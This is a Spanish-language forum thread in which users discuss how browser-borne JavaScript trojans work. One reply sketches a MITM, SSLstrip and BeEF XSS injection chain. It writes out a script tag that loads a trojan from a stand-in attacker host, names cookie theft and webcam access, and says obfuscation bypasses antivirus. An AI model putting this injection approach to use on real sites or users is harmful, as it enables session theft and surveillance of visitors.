|
Título: Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan? Publicado por: dega1980 en 13 Abril 2014, 14:09 pm He visto que en algunas webs cuando se cargan salta el escudo del antivirus,diciendo que ha detectado uno de estos archivos.
Alguien sabe que son y como funcionan,de verdad te pueden colar un virus nada mas por cargar una web? saludos Título: Re: Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan? Publicado por: daryo en 13 Abril 2014, 14:35 pm He visto que en algunas webs cuando se cargan salta el escudo del antivirus,diciendo que ha detectado uno de estos archivos. Alguien sabe que son y como funcionan,de verdad te pueden colar un virus nada mas por cargar una web? saludos si se puede , es una de las razones por las que java ahora esta desactivado por defecto en los navegadores. con respecto a los alertas decias googleando encontre: http://www.f-secure.com/v-descs/trojan_w32_trojan-clicker.shtml http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:JS/Redirector.GZ como yo lo veo no es precisamente un troyano :P Título: Re: Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan? Publicado por: dega1980 en 13 Abril 2014, 15:24 pm si se puede , es una de las razones por las que java ahora esta desactivado por defecto en los navegadores. con respecto a los alertas decias googleando encontre: http://www.f-secure.com/v-descs/trojan_w32_trojan-clicker.shtml http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:JS/Redirector.GZ como yo lo veo no es precisamente un troyano :P si las alertas si que las vi hay informacion que dice que es un troyano como protegerse,lo que quiero entender es como funciona. un saludo :huh: Título: Re: Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan? Publicado por: .:UND3R:. en 13 Abril 2014, 19:34 pm Si mal no me equivoco es un troyano en javascript, la idea es combinarlo con un MITM + SSLSTRIP + inyección de código + Beef XSS (especie de troyano en javascript) o de forma alternativa ser dueño de una web popular o desfacear una y agregar el javascript de Beef XSS, la idea es así:
- El usuario ingresa a una página - A través de MITM + SSLSTRIP toda página aun HTTPS se agrega un código: <script type=java/script src=http://hackerweb.com/trojan.js> (no recuerdo bien) - Este troyano, detecta el navegador, sistema operativo, permite agregar un iframe, activar la webcam a través de adobeflash player, stealer cookie, etc. Lo bueno es que al ser javascript la ofuscación es fácil de hacer lo cual facilitaría el bypass de AV, desconozco si se realiza un análisis heurístico a javascript |